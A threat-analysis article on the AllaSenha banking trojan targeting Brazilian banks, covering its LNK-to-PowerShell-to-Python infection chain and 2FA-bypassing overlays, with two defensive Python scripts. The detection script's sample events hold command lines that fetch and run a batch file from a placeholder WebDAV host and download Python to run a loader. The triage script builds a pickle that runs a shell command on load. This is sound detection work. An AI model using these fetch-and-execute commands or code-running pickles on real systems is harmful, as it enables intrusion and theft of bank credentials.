AllaSenha: The Windows Banking Malware Threatening Brazilian Banks
Brazilian banking institutions have become targets of a sophisticated cyberattack campaign involving a custom variant of the Windows-based AllaKore remote access trojan (RAT), now known as AllaSenha. Here, we delve into the technical intricacies of AllaSenha, its attack vector, and its implications for Brazilian banks and their customers.
The AllaSenha Campaign
AllaSenha is specifically engineered to steal credentials necessary for accessing Brazilian bank accounts. Leveraging Azure cloud services for its command-and-control (C2) infrastructure, the malware represents a significant evolution in cyber threats targeting financial institutions.
Targeted Financial Institutions
The campaign targets major Brazilian banks such as Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob, and Sicredi. Although the precise method of initial infection remains uncertain, phishing messages containing malicious links are strongly believed to be the primary vector.
Attack Initiation and Malware Deployment
The attack typically begins with a malicious Windows shortcut (LNK) file disguised as a PDF document, "NotaFiscal.pdf.lnk," which has been hosted on a WebDAV server since March 2024. Once launched, this LNK file executes a Windows command shell. The shell opens a decoy PDF file to distract the recipient while simultaneously retrieving a batch script (BAT) payload named "c.cmd" from the same WebDAV server.
The BPyCode Launcher
Dubbed the BPyCode launcher, this BAT payload runs a Base64-encoded PowerShell command. The command downloads a Python interpreter from the official python.org site and uses it to execute a Python script named BPyCode. BPyCode is a downloader for a dynamic-link library (DLL) called "executor.dll," which is run in memory rather than written to disk. The DLL is fetched from domain names produced by a domain generation algorithm (DGA); the generated names are typically hosted on the Microsoft Azure Functions service, which lets the operators deploy and rotate infrastructure on demand.
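The chain described in the two paragraphs above (an LNK that runs cmd.exe against a WebDAV share, then a Base64-encoded PowerShell command that fetches Python and runs a script with it) leaves distinctive process-creation telemetry. The script below is an added example, not code from the original page or from the malware's authors: it decodes -EncodedCommand payloads the way powershell.exe does (Base64, then UTF-16LE) and applies three rules to constructed Sysmon-style events. The WebDAV host, the file paths, the PowerShell body and the "python.exe running from a user-writable directory" heuristic are all assumptions made for illustration.

```python
import base64
import re
from typing import List, Optional

# Constructed Sysmon-style process-creation events modelled on the chain
# described above (LNK -> cmd.exe -> c.cmd -> encoded PowerShell -> python.exe).
# Host, paths and the PowerShell body are invented for illustration; the
# 203.0.113.0/24 range is reserved for documentation.
SAMPLE_PS = (
    "$u='https://www.python.org/ftp/python/3.12.3/python-3.12.3-embed-amd64.zip';"
    "Invoke-WebRequest $u -OutFile $env:TEMP\\py.zip;"
    "Expand-Archive $env:TEMP\\py.zip $env:TEMP\\py;"
    "& $env:TEMP\\py\\python.exe $env:TEMP\\bpycode.py"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'cmd.exe /c start "" "\\203.0.113.10@80\DavWWWRoot\NotaFiscal.pdf" '
                    r'& copy \\203.0.113.10@80\DavWWWRoot\c.cmd %TEMP%\c.cmd & %TEMP%\c.cmd'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_powershell(SAMPLE_PS)},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\py\python.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\victim\AppData\Local\Temp\py\python.exe C:\Users\victim\AppData\Local\Temp\bpycode.py"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# UNC path into a WebDAV share, e.g. \\host@80\DavWWWRoot\... or \\host@SSL\DavWWWRoot\...
WEBDAV_RE = re.compile(r"\\\\[\w.\-]+(?:@(?:SSL|\d+))?\\DavWWWRoot\\", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Directories a standard user can write to; a real Python install does not live here (assumption).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script of a -EncodedCommand invocation, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> List[str]:
    """Return the names of the detection rules the event triggers, in evaluation order."""
    hits = []
    image = event["Image"].lower()
    cmdline = event["CommandLine"]
    if image.endswith("\\cmd.exe") and WEBDAV_RE.search(cmdline):
        hits.append("cmd_webdav_fetch")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_powershell")
        if "python.org" in decoded.lower():
            hits.append("python_downloader")
    if image.endswith("\\python.exe") and any(p in image for p in USER_WRITABLE):
        hits.append("python_from_user_path")
    return hits


def scan(events) -> dict:
    """Map event index -> triggered rules for every event that triggers at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, EVENTS[idx]["Image"], hits)
```

The decoding step matters more than the string matches: an attacker can rename c.cmd or change the WebDAV host, but cannot avoid handing PowerShell a UTF-16LE script, so decode first and write rules against the decoded text rather than against the Base64 blob.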
Multi-stage Payload Delivery
The BPyCode script retrieves a pickle file containing three components: a second Python loader script, a ZIP archive with the PythonMemoryModule package, and another ZIP archive containing "executor.dll." The second loader script uses PythonMemoryModule to load "executor.dll," a Borland Delphi-based malware named ExecutorLoader, directly into memory without writing it to disk. ExecutorLoader's primary role is to decode AllaSenha and execute it by injecting it into a legitimate mshta.exe process.
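Because the second stage arrives as a pickle, the safest first move when analysing a captured sample is to inspect the opcode stream rather than call pickle.load, which executes whatever imports and calls the pickle encodes. The block below is an added example, not code from the page or from the malware's authors. It builds a constructed stand-in for the three-part pickle (a placeholder loader script, a placeholder PythonMemoryModule ZIP and a placeholder executor.dll ZIP, all invented here) beside a pickle that would call os.system on load, and shows how pickletools flags the second while a restricted Unpickler extracts the first as inert data.

```python
import io
import os
import pickle
import pickletools
import zipfile

# Opcodes that make the unpickler import or call something; a pure data pickle never needs them.
DANGEROUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}


def make_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP archive from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed stand-in for the three-part pickle described above:
# (second-stage loader script, ZIP with PythonMemoryModule, ZIP with executor.dll).
# Contents are placeholders, not the real payload.
LOADER_PY = "import pythonmemorymodule\n# placeholder second-stage loader\n"
BENIGN = pickle.dumps(
    (LOADER_PY,
     make_zip({"pythonmemorymodule/__init__.py": "# placeholder package"}),
     make_zip({"executor.dll": b"MZ" + b"\x00" * 62})),
    protocol=4,
)


class _RunsOnLoad:
    """Pickles to a call of os.system(...). Loading it would run the command; we only inspect it."""
    def __reduce__(self):
        return (os.system, ("echo this command would run during pickle.load",))


MALICIOUS = pickle.dumps(_RunsOnLoad(), protocol=4)


def triage(data: bytes) -> dict:
    """Walk the opcode stream without executing it and report any code-executing opcodes."""
    names = [op.name for op, _arg, _pos in pickletools.genops(data)]
    found = sorted(set(names) & DANGEROUS)
    return {"opcode_count": len(names), "dangerous": found, "safe_to_load": not found}


class _NoImports(pickle.Unpickler):
    """Unpickler that refuses every import; only literal data can pass through it."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def extract_components(data: bytes):
    """Return the three components as inert data, or None if the pickle is not pure data."""
    if not triage(data)["safe_to_load"]:
        return None
    try:
        loader, pmm_zip, dll_zip = _NoImports(io.BytesIO(data)).load()
    except (pickle.UnpicklingError, ValueError):
        return None
    return {
        "loader_first_line": loader.splitlines()[0],
        "pmm_files": zipfile.ZipFile(io.BytesIO(pmm_zip)).namelist(),
        "dll_files": zipfile.ZipFile(io.BytesIO(dll_zip)).namelist(),
    }


if __name__ == "__main__":
    print("benign:", triage(BENIGN), extract_components(BENIGN))
    print("malicious:", triage(MALICIOUS), extract_components(MALICIOUS))
```

Both checks are kept because each covers a gap in the other: pickletools.genops proves what the stream contains before anything is instantiated, and overriding find_class guarantees that even a pickle the opcode scan misjudged cannot resolve a module attribute during load. The extracted ZIP members are only listed, never executed; the DLL inside can then go to a disassembler.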
Credential Theft and Two-Factor Authentication Bypass
AllaSenha's primary objective is to steal online banking credentials from web browsers. Additionally, it can display overlay windows to capture two-factor authentication (2FA) codes. It can even deceive victims into scanning a QR code to approve fraudulent transactions initiated by the attackers. Because the victim supplies the code or approves the transaction themselves, these overlays defeat 2FA schemes that rely on the legitimate user completing the second step, which is why the malware poses a severe risk even to accounts with 2FA enabled.
Links to KL Gorki Project
All AllaSenha samples use the file name "Access_PC_Client_dll.dll." This file name is also associated with the KL Gorki project, a banking malware that combines components of AllaKore and ServerSocket. Furthermore, a Portuguese-speaking user named bert1m has been identified as a potential developer of the malware, although there is no concrete evidence linking them to its operation.
Broader Implications and Regional Trends
The AllaSenha campaign highlights a broader trend of cybercrime originating from Latin America. Cybercriminals in this region appear to be particularly adept at launching campaigns to steal banking details. While their primary targets are individuals in Latin America, they often compromise systems operated by subsidiaries or employees of international companies based in Brazil, extending their global reach.
Other Banking Trojans in the Region
The emergence of AllaSenha is part of a larger pattern of banking trojan attacks in Latin America. For example, Forcepoint recently detailed malspam campaigns distributing another banking trojan, Casbaneiro (aka Metamorfo and Ponteiro), aiming to siphon victims' financial information. This malware, distributed via HTML attachments in emails, lures users into executing malicious code, leading to data compromise.
Android Banking Trojans: A Parallel Threat
Windows is not the only platform under attack. There is also an Android banking malware campaign involving Anatsa (also tracked as TeaBot and Toddler). These attacks use decoy applications uploaded to the Google Play Store and disguised as legitimate productivity tools. Once installed, these apps steal banking credentials using overlay and accessibility-service techniques and exfiltrate them to the operators.
The AllaSenha campaign underscores the growing sophistication and regional focus of cyber threats targeting financial institutions. As cybercriminals continue to refine their methods and expand their reach, it becomes increasingly critical for banks and their customers to adopt robust security measures. Awareness and vigilance remain key defenses against these evolving threats.